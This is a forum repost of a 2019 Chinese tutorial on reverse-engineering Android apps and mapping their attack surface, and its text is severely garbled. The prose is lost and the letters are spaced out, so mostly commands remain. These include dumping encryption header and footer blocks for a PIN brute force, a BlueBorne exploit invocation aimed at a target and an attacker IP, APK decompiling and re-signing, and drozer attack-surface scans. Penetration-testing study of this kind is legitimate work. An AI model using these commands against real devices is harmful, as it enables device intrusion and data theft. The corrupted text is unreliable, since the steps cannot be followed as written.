搜索

[13802] 2019-02-26_测试Android应用程序的逆向方法和寻找攻击面的技巧

文档创建者:s7ckTeam
浏览次数:51
最后更新:2025-01-18
2019-02-26_测试Android应用程序的逆向方法和寻找攻击面的技巧 A n d r o i d s e c i s t   F r e e B u f   2 0 1 9 - 0 2 - 2 6 怀 A n d r o i d   A n d r o i d 5 L i n u x 4 广 访 D a l v i k   V M j a v a D a l v i k d e x S a n t o k u 使 V M :   S a n t o k u   h t t p s : / / s a n t o k u - l i n u x . c o m / d o w n l o a d / U S B   - >     - >     - >   7   - >     - >   U S B   - >   I D 使 I D s h e l l s h e l l a d b   d e v i c e s   - l a d b   - s   c e 2 0 c 6 e 4   s h e l l
L i n u x P I N   h t t p s : / / s a n t o k u - l i n u x . c o m / h o w t o / m o b i l e - f o r e n s i c s / h o w - t o - b r u t e - f o r c e - a n d r o i d - e n c r y p t i o n / H e a d e r F o o t e r   P I N $   a d b   s h e l l   d d   i f = / d e v / b l o c k / m m c b l k 0 p 2   o f = t m p _ h e a d e r   b s = 5 1 2   c o u n t = 1 $   a d b   p u l l   t m p _ h e a d e r   ~ / D e s k t o p / t m p _ h e a d e r $   a d b   s h e l l   m k d i r   / e f s $   a d b   s h e l l   m o u n t   - t   y a f f s 2   / d e v / b l o c k / m t d b l o c k 6   / e f s $   a d b   p u l l   / e f s / u s e r d a t a _ f o o t e r   ~ / D e s k t o p / t m p _ f o o t e r
t c p d u m p 使 W i r e s h a r k A F L o g i c a l   O S E m m s A n d r o i d D e f c o n 使 3 $   b r u t e f o r c e _ s t d c r y p t o   ~ / D e s k t o p / t / t m p _ h e a d e r   ~ / D e s k t o p / t / t m p _ f o o t e r a d b   s h e l l   t c p d u m p   - s   0   - w |   n c   - l   - p   4 4 4 4 a d b   f o r w a r d   t c p : 4 4 4 4   t c p : 4 4 4 4 n c   l o c a l h o s t   4 4 4 4   |   s u d o   w i r e s h a r k   - k   - S   - i
c s v i n f o . x m l 使 B l u e b o r n e h t t p s : / / a r m i s . c o m / b l u e b o r n e / P Y T H O N P A T H $   s u d o   a p t - g e t   i n s t a l l   l i b b l u e t o o t h - d e v $ s u d o   p i p 2   i n s t a l l   p y b l u e z   p w n   s c a p y
  A P K A n d r o i d U S B   D e b u g g e r D e x 2 j a r J D - G u i i n f o . x m l . j a v a a p k a p k   -   A P K d e x a p k F a c e b o o k 5 7 . 2 m b S k y p e ~ 3 0 . 7 m b T w i t t e r 2 9 . 8 m b F a c e b o o k   a p k 使 d e x 2 j a r a p k . d e x   a p k . j a r $   e x p o r t   P Y T H O N P A T H = $ P Y T H O N P A T H : < r e p o - p a t h > $   s u d o   p y t h o n 2   d o i t . p y   h c i 0   < t a r g e t - b d a d d r >   < a t t a c k e r - i p >
j a r J D - G U I J D - G U I J a v a F a c e b o o k O p e n   -   s m a l i s m a l i / c o m 使 a p k t o o l b   - f   [ a p p ]   -   f   a p k     a p k   $   a d b   c o n n e c t   1 0 . 0 . 2 . 5 $   a d b   p u l l   / s y s t e m / f r a m e w o r k / f r a m e w o r k - r e s . a p k   $   a p k t o o l   i f   f r a m e w o r k - r e s . a p k $   a p k t o o l   d   - r   a p p . a p k   #   a p p k e y t o o l   - a l i a s   a m   - g e n k e y   - v   - k e y s t o r e   m y - r e l e a s e - k e y . k e y s t o r e - k e y a l g   R S A   - k e y s i z e   2 0 4 8   - v a l i d i t y   1 0 0 0 0 $   j a r s i g n e r   - v e r b o s e   - s i g a l g   S H A 1 w i t h R S A   - d i g e s t a l g   S H A 1 - k e y s t o r e   m y - r e l e a s e k e y . k e y s t o r e   [ y o u r - o l d - a p p - n a m e ] . a p k   [ $   j a r s i g n e r   - k e y s t o r e   d e b u g . k e y s t o r e   - s i g a l g   S H A 1 w i t h R S A   t e s t . a p k   a n d r o i d d e b u g k e y $   j a r s i g n e r   - k e y s t o r e   d e b u g . k e y s t o r e   - v e r i f y   - v e r b o s e   - c e r t s   t e s t . a p k ]
a p k D r o z e r h t t p s : / / g i t h u b . c o m / m w r l a b s / d r o z e r D r o z e r   D r o z e r M W R   L a b s A n d r o i d A n d r o i d a n d r o i d W e b , D r o z e r D r o z e r 使 D r o z e r D r o z e r A n d r o i d D r o z e r   D r o z e r 3 1 4 1 5 a d b D r o z e r A n d r o i d D r o z e r l i s t s h e l l c l e a n l o a d m o d u l e u n s e t s e t s h e l l r u n   M O D U L E 使 D r o z e r a p p h t t p s : / / g i t h u b . c o m / t a n p r a t h a n / M o b i l e A p p - P e n t e s t - C h e a t s h e e t h t t p s : / / w w w . t u t o r i a l s p o i n t . c o m / a n d r o i d _ p e n e t r a t i o n _ t e s t i n g / a n d r o i d _ p e n e t r a t i o n _ t e s t i n g _ o v e r v i e w . a s p h t t p s : / / l e a r n . t e c h b e a c o n . c o m / u n i t s / h o w - g e t - s t a r t e d - m o b i l e - p e n e t r a t i o n - t e s t i n g - a n d r o i d h t t p s : / / w w w . o w a s p . o r g / i n d e x . p h p / O W A S P _ M o b i l e _ S e c u r i t y _ T e s t i n g _ G u i d e h t t p s : / / g o . a r m i s . c o m / h u b f s / B l u e B o r n e % 2 0 - % 2 0 A n d r o i d % 2 0 E x p l o i t % 2 0 ( 2 0 1 7 1 1 3 0 ) . p d f ? t = 1 5 4 1 1 0 4 0 4 9 6 5 4 . p d f ? t = 1 5 4 1 1 0 4 0 4 9 6 5 4 ) h t t p s : / / l a b s . m w r i n f o s e c u r i t y . c o m / a s s e t s / B l o g F i l e s / m w r i - d r o z e r - u s e r - g u i d e - 2 0 1 5 - 0 3 - 2 3 . p d f h t t p s : / / r e s o u r c e s . i n f o s e c i n s t i t u t e . c o m / a n d r o i d - p e n e t r a t i o n - t o o l s - w a l k t h r o u g h - s e r i e s - d r o z e r / # g r e f * u s e j o u r n a l F B s e c i s t F r e e B u f . C O M $   a d b   i n s t a l l   [ a p p ] . a p k $   a d b   i n s t a l l   d r o z e r - a g e n t . a p k $   a d b   f o r w a r d   t c p : 3 1 4 1 5   t c p : 3 1 4 1 5 S t a r t   a   d r o z e r   s e s s i o n   o v e r   d e f a u l t   p o r t   3 1 4 1 5 : $   d r o z e r   c o n s o l e   c o n n e c t d z >   r u n   a p p . p a c k a g e . l i s t d z >   r u n   a p p . p a c k a g e . a t t a c k s u r f a c e   s i e 5 7 1 . s i e 5 7 1

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理